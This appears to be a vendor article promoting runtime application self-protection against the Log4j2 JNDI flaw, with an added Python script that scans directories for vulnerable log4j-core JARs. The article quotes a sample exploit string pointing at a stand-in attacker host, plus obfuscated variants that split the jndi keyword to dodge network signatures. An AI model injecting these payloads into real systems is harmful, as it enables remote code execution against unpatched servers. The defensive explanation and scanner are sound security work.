Why RASP Outperforms Traffic‑Based Defenses Against Log4j2 Exploits
The Apache Log4j2 remote code execution flaw is hard to contain because it yields arbitrary code execution and its exploit strings can be split so that network signatures never see a contiguous payload. Runtime Application Self‑Protection (RASP) instead detects the malicious behavior inside the application, which gives a low false‑positive rate and automatic discovery of the vulnerable component without depending on constantly updated rules.
Log4j2 Vulnerability Characteristics
The Apache Log4j2 remote‑code‑execution (RCE) flaw (CVE‑2021‑44228) enables arbitrary code execution through JNDI lookup injection: attacker‑controlled text that reaches a log message is interpreted as a lookup expression and evaluated. Because Log4j2 is a core logging library that a very large share of Java applications bundle, directly or through a dependency, the attack surface is extremely large.
Two technical traits make detection difficult:
Arbitrary remote code execution – an attacker can place a malicious JNDI lookup such as ${jndi:ldap://attacker.com/a} in any string that ends up in a log message (a User‑Agent header, a username, a search term). The vulnerable JVM resolves the lookup, contacts the attacker's server and can be made to load and execute attacker‑supplied classes.
Obfuscated traffic patterns – attackers split the jndi keyword using Log4j2's own lookups, for example ${lower:j}Ndi, ${upper:JN}di, or a default‑value expression such as ${aaa:vv:cc:-j}ndi, which resolves to j because no aaa lookup exists (the lookup prefix is matched case‑insensitively, so jNdi is accepted). Log4j2 reassembles the fragments when it evaluates the expression, but on the wire the payload never contains a contiguous ${jndi: string, so signature‑based network detection is unreliable.
Runtime Application Self‑Protection (RASP)
RASP instruments a running application by hooking security‑critical APIs (e.g., JNDI lookups, process execution, file I/O, network calls). It observes the application's behavior in real time and blocks operations that match high‑risk patterns such as command execution, file upload, or Server‑Side Request Forgery (SSRF), regardless of how the triggering input was encoded.
Why RASP defeats 0‑day attacks
True‑positive focus – RASP blocks only dangerous operations the application actually invokes (for Log4j2, the JNDI lookup to a remote host), so it does not raise the speculative alarms that payload matching produces for input that never reaches a vulnerable code path.
Low false‑positive rate – if an application does not use Log4j2, the same payload never reaches a hooked JNDI API, so there is nothing to alert on; a traffic‑based sensor would flag it anyway.
Component self‑discovery – because the agent runs inside the JVM, it can report the exact JAR or class path from which the vulnerable Log4j2 classes were loaded and correlate that version with known CVE identifiers (e.g., CVE‑2021‑44228), which shortens remediation.
Cloud‑Native RASP Architecture
Alibaba Cloud’s RASP is built as a lightweight, cloud‑native agent that can be attached to a Java process with a single click through the ARMS console. The design emphasizes minimal performance overhead, automatic scaling, and compatibility with containerized or VM‑based deployments.
In production deployments during the Log4j2 incident, the cloud‑native RASP intercepted 184 real attacks across eight Java applications within two days, including:
43 command‑execution attempts
141 DNS‑based reconnaissance probes
These attacks would likely have succeeded without the in‑process protection.
Additional Benefits of RASP
Automatic third‑party component discovery – when a new 0‑day emerges, RASP immediately reports the file‑system path of the vulnerable component, as the original article's screenshot of Log4j2 location detection illustrates.
CVE enrichment – Detected components are automatically matched to their CVE IDs, severity scores, and remediation guidance.
Rule‑free protection – Because RASP evaluates application behavior rather than network signatures, it remains effective against encrypted traffic, memory‑resident malware, or any future obfuscation technique that changes payload appearance.
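An offline approximation of the component‑discovery and CVE‑enrichment step described above (and under "Component self‑discovery" earlier). This is an added example, not code from the original article or from any RASP product: a real RASP agent reports the JAR path from inside the JVM, whereas this script walks a directory tree, identifies log4j‑core JARs by their Maven pom.properties, reads the version and maps it to CVE‑2021‑44228. The function names, the status and remediation strings, and the fixture JARs built in a temporary directory are this example's own; the affected‑version range follows the Apache advisory (2.0‑beta9 through 2.14.1, excluding the 2.3.1 and 2.12.2 back‑ports), and the JndiLookup.class presence check reflects the published stop‑gap of deleting that class from the JAR.

```python
"""Added example; not code from the original article or from any RASP product.
Offline approximation of component discovery + CVE enrichment for log4j-core
JARs.  Function names, fixture JARs and status strings are this example's own."""
import re
import tempfile
import zipfile
from pathlib import Path
from typing import Optional

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(v: str):
    """'2.14.1' -> ((2, 14, 1), ''); '2.0-beta9' -> ((2, 0, 0), 'beta9')."""
    base, _, pre = v.partition("-")
    nums = [int(x) for x in base.split(".")]
    nums += [0] * (3 - len(nums))
    return tuple(nums[:3]), pre.lower()


def cve_2021_44228_affected(version: str) -> bool:
    """Apache advisory range: 2.0-beta9 through 2.14.1, except the 2.3.1+ and
    2.12.2+ security back-ports for older JDKs.  The follow-on CVEs that hit
    2.15.0/2.16.0 are out of scope for this example."""
    nums, pre = parse_version(version)
    if nums == (2, 0, 0) and pre:                     # 2.0 pre-releases
        tag, num = re.match(r"([a-z]*)(\d*)", pre).groups()
        return tag == "rc" or (tag == "beta" and int(num or 0) >= 9)
    if nums[:2] == (2, 3) and nums[2] >= 1:
        return False
    if nums[:2] == (2, 12) and nums[2] >= 2:
        return False
    return (2, 0, 0) <= nums <= (2, 14, 1)


def inspect_jar(path: Path) -> Optional[dict]:
    """Finding for a log4j-core JAR, or None if the file is not one.
    (Nested JARs inside WAR/EAR archives are not unpacked by this example.)"""
    try:
        with zipfile.ZipFile(path) as zf:
            names = set(zf.namelist())
            if POM_PROPS not in names:
                return None
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
    except zipfile.BadZipFile:
        return None
    version = next((line.split("=", 1)[1].strip() for line in props.splitlines()
                    if line.startswith("version=")), None)
    if version is None:
        return None
    affected = cve_2021_44228_affected(version)
    has_jndi = JNDI_CLASS in names
    if not affected:
        status, fix = "not affected", None
    elif has_jndi:
        status, fix = "vulnerable", "upgrade log4j-core; stop-gap: delete JndiLookup.class from the JAR"
    else:
        status, fix = "mitigated", "JndiLookup.class already removed; still upgrade log4j-core"
    return {"path": str(path), "version": version, "jndi_lookup_present": has_jndi,
            "cves": ["CVE-2021-44228"] if affected else [],
            "cvss": 10.0 if affected else None,        # NVD CVSS v3.1 base score
            "status": status, "remediation": fix}


def scan(root: Path) -> list:
    """Findings for every log4j-core JAR under root, sorted by path."""
    findings = (inspect_jar(p) for p in root.rglob("*.jar"))
    return sorted((f for f in findings if f), key=lambda f: f["path"])


def make_fixture(root: Path) -> None:
    """Constructed fixture: three fake log4j-core JARs and one unrelated JAR.
    The class entry holds only the class-file magic; nothing here is loadable."""
    (root / "lib").mkdir()

    def jar(name, version=None, with_jndi=True):
        with zipfile.ZipFile(root / "lib" / name, "w") as zf:
            if version:
                zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
            if with_jndi:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")

    jar("log4j-core-2.14.1.jar", "2.14.1")
    jar("log4j-core-2.14.1-stripped.jar", "2.14.1", with_jndi=False)
    jar("log4j-core-2.17.1.jar", "2.17.1")
    jar("guava.jar", with_jndi=False)                 # unrelated JAR, no pom.properties


def run_demo() -> list:
    """Build the fixture in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        make_fixture(root)
        return scan(root)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['status']:<13} {f['version']:<8} jndi={f['jndi_lookup_present']!s:<5} {f['path']}")
```

Point it at a real deployment with scan(Path("/opt/app")) (path assumed) to get the same path/version/CVE triples an in‑process agent reports; the "mitigated" status distinguishes a JAR that had JndiLookup.class stripped as a stop‑gap from one that is still exploitable, which a version check alone cannot do.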
Alibaba Cloud Native